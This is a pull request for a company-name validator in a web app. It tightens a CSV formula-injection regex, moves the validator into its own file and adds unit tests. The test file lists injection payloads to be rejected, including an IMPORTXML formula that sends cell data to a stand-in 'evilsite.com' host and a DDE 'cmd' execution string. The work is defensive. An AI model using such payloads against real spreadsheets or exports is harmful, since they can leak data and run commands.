### PR TITLE
Fix company name csv injection regex

### DIFF
--- a/src/apps/companies/apps/add-company/__test__/nameValidator.test.js
+++ b/src/apps/companies/apps/add-company/__test__/nameValidator.test.js
@@ -1,0 +1,32 @@
+import nameValidator from '../client/nameValidator'
+
+describe('names with possible csv injections', () => {
+  const csvStrings = [
+    '=IMPORTXML(CONCAT(""http://evilsite.com?leak="", CONCATENATE(A2:B2)), ""//a"")',
+    '@COMPANY_NAME',
+    ', =cmd|`/C ping -t 172.0.0.1 -l 25152`!`A1',
+    '+A1',
+    '-A1',
+    '	name',
+    'name, =cmd',
+    'name, @COMPANY_NAME',
+    'name,   +=IMPORTXML',
+    'name, ,  -IMPORTXML',
+  ]
+
+  csvStrings.forEach((element) => {
+    it(`returns invalid name for string ${element}`, () => {
+      expect(nameValidator(element)).to.equal('Enter a valid name')
+    })
+  })
+})
+
+describe('innocent possible names', () => {
+  const companyNames = ['A=M', 'My Company@', 'My,Company', '4MY', 'good+evil']
+
+  companyNames.forEach((name) => {
+    it(`returns null for ${name}`, () => {
+      expect(nameValidator(name)).to.be.null
+    })
+  })
+})

--- a/src/apps/companies/apps/add-company/client/CompanyNotFoundStep.jsx
+++ b/src/apps/companies/apps/add-company/client/CompanyNotFoundStep.jsx
@@ -15,8 +15,8 @@ import {
   WEBSITE_REGEX,
   NON_ASCII_REGEX,
   GENERIC_PHONE_NUMBER_REGEX,
-  CSV_FORMULA_INJECTION_REGEX,
 } from './constants'
+import nameValidator from './nameValidator'
 
 const websiteValidator = (
   value,
@@ -48,13 +48,6 @@ const telephoneValidator = (
   return null
 }
 
-const nameValidator = (value) => {
-  return !value
-    ? 'Enter name'
-    : CSV_FORMULA_INJECTION_REGEX.test(value)
-    ? 'Enter a valid name'
-    : null
-}
 function CompanyNotFoundStep({ organisationTypes, country, features }) {
   return (
     <Step name="unhappy">

--- a/src/apps/companies/apps/add-company/client/constants.js
+++ b/src/apps/companies/apps/add-company/client/constants.js
@@ -15,5 +15,8 @@ export const GENERIC_PHONE_NUMBER_REGEX = /^$|([0-9]|#|\+|\s|\(|\))+$/
 export const NON_ASCII_REGEX = /[^$|\x00-\x7F]/
 
 // Prevents CSV formula injection attacks
+// 1st Case: anything beginning with =,@,+,tab or carriage return
+// 2nd Case: if there is a comma with one of those symbols after it (see owasp suggestions)
 // https://owasp.org/www-community/attacks/CSV_Injection
-export const CSV_FORMULA_INJECTION_REGEX = /^[=+-@]/
+export const CSV_FORMULA_INJECTION_REGEX =
+  /(^[=@+\t\r-])|((?<=[,;'"])[\s\S]*[=@+-])/

--- a/src/apps/companies/apps/add-company/client/nameValidator.js
+++ b/src/apps/companies/apps/add-company/client/nameValidator.js
@@ -1,0 +1,12 @@
+import { CSV_FORMULA_INJECTION_REGEX } from '../client/constants'
+
+const nameValidator = (value) => {
+  if (!value) {
+    return 'Enter name'
+  } else if (CSV_FORMULA_INJECTION_REGEX.test(value)) {
+    return 'Enter a valid name'
+  }
+  return null
+}
+
+export default nameValidator


### PR DESCRIPTION
## Description of change

Company names are valid if they have a number in front of them e.g. (4MY). The regex that was being applied was slightly malformed and was erroring in this case. I've tweaked it a bit to follow the owasp recommendations and added some tests. 

I'm not entirely sure why we need the validation on this one field, but perhaps something to do with the data being exported into a spreadsheet somewhere?

For some reason I couldn't import the `nameValidator` function and unit test it if it was in the component file, so I've created a separate file for it. I think it's a mocha/babel compilation issue as we are able to [test exports from .jsx files elsewhere](https://github.com/uktrade/data-hub-frontend/blob/c65c2cb25851f0394a9e5d5331e8d4003f6aa339/src/client/components/ActivityFeed/activities/__test__/AventriAttendee.test.js)

## Test instructions

_What should I see?_

## Screenshots
### Before

_Add a screenshot_

### After

_Add a screenshot_

## Checklist

[//]: # "When submitting a PR make sure the code review guidelines have been satisfied.
https://github.com/uktrade/data-hub-frontend/blob/master/docs/Code%20review%20guidelines.md"

- [ ] Has the branch been rebased to master?
- [ ] Automated tests (Any of the following when applicable: Unit, Functional or End-to-End)
- [ ] Manual compatibility testing (Browsers: Chrome, Firefox, Edge, Safari)
